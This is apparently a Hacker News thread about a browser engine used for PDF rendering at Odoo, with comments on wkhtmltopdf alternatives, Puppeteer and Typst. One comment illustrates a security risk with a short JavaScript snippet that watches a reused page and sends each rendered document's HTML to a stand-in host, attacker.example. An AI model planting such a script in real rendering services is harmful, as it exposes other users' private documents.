What’s the long term goal of this project beyond learning? Building a browser that supports the modern web is a humongous undertaking IMHO.
The main goal is great support for rendering static documents, as it's used at the core of the paper-muncher [1] PDF rendering engine, meant to replace wkhtmltopdf at Odoo. But we don't rule out general web browsing and JavaScript support at some point.
[1] https://github.com/odoo/paper-muncher
Ooh blast from the past!
At a previous company we moved off of wkhtmltopdf to a nodejs service which received static HTML and rendered it to PDF using PhantomJS. These days you'd probably use Puppeteer.
The trick was keeping the page context open, avoiding Chrome startup costs and the cost of recreating `page`. The node service would initialize a page object once with a script inside that communicated with the server via a named Linux pipe. Then, for each request:
1. node service sends the static html to the page over the pipe
2. the page script receives the html from the pipe, inserts it into the DOM, and sends an “ack” back over the pipe
3. the node service receives the “ack” and calls the PDF rendering method on the page.
I don’t remember why we chose the pipe method; I’m sure there’s a better way to pass data to headless contexts these days, something like the sketch below.
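For what it’s worth, here’s a minimal sketch of the same keep-the-page-open trick using today’s Puppeteer API (the names and options are illustrative, not our original service):

```js
// Launch Chrome once and reuse a single page across requests, so the
// per-request cost is just setContent + pdf rather than browser startup.
const fs = require('fs');
const puppeteer = require('puppeteer');

async function main() {
  const browser = await puppeteer.launch();
  const page = await browser.newPage(); // created once, reused for every request

  // Per request: inject the static HTML directly (no pipe needed) and render.
  async function renderPdf(html) {
    await page.setContent(html, { waitUntil: 'networkidle0' });
    return page.pdf({ format: 'A4', printBackground: true });
  }

  fs.writeFileSync('out.pdf', await renderPdf('<h1>Invoice #42</h1>'));
  await browser.close();
}

main();
```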
The whole thing was super fast (~20 ms) compared to wkhtmltopdf, which took at least 30 seconds for us and would more often than not just time out.
Sounds like fun considering how real the problem is.
It was!
I remember the afternoon I had the idea: it was beer Friday, and it took a few hours to write up a basic prototype that rendered a PDF in a few hundred milliseconds. That was the first time I’d shipped a 100x speed improvement. Felt like a real rush.
Congratulations. Doesn't this approach make so much more sense than writing a browser engine from scratch?
Maybe? I'd say it depends on what you're rendering. We rendered HTML that we created ourselves, filled in with data that we parsed and validated. Styles across the generated documents were also largely the same.
If your job is to render arbitrary user HTML, this could get much hairier. First of all, print rendering at the time (and probably now) was notoriously finicky: things like adjusting colors, rendering SVGs properly, and pagination were difficult, and it took a lot of effort to get right.
Furthermore, if you're sending arbitrary HTML, you now have a much larger attack surface. If someone figures out how to call `addEventListener` within the page context, they can snoop on every PDF generated by that page.
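To make the risk concrete, here’s a hypothetical payload (attacker.example stands in for an exfiltration endpoint): because the page context is reused across requests, a script planted by one document can observe every document inserted afterwards.

```js
// Hypothetical payload smuggled in via user-supplied HTML. Because the
// page object is reused across requests, this observer outlives the
// request that planted it and sees each document inserted later.
const observer = new MutationObserver(() => {
  // Ship the freshly inserted HTML (someone else's PDF content) offsite.
  navigator.sendBeacon('https://attacker.example/exfil', document.body.innerHTML);
});
observer.observe(document.body, { childList: true, subtree: true });
```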
At work we recently switched from wkhtmltopdf to Typst, which is a breath of fresh air. It is very fast and generates PDFs from scratch, without needing to involve HTML or a browser engine. It is implemented in Rust and distributed as a self-contained binary.
This blog post convinced us that the switch was worth it: https://zerodha.tech/blog/1-5-million-pdfs-in-25-minutes/
Oh interesting. I use their "old stack" for a couple of much smaller projects and it works fine, but it does seem a bit ridiculous to be starting up a whole Chrome instance just to convert one file format to another.
I also love Typst and use it regularly. But just to note: there is also https://weasyprint.org, which takes HTML as input.
So cool to see Odoo mentioned on HN. I've worked with it before and like it a lot.
I've made posts about it on HN before but they've never gained traction. I hope that this takes off.
You guys make neat software.
Does it support page margin boxes?
Yes!
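(For anyone unfamiliar: page margin boxes are the CSS Paged Media `@page` margin at-rules used for running headers, footers, and page counters, along these lines.)

```css
/* The spec defines sixteen named boxes in the page margin that can
   carry generated content. */
@page {
  margin: 2cm;
  @top-center { content: "Quarterly Report"; }                   /* running header */
  @bottom-right { content: counter(page) " / " counter(pages); } /* page N / total */
}
```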
Looks like Skift is a hobby OS like SerenityOS, which Ladybird was spun out of. Maybe they intend to follow the same path?
I intend to keep Skift and Vaev together for as long as possible since everything is meant to be cross-platform. I don’t see any architectural conflict that would motivate such a change.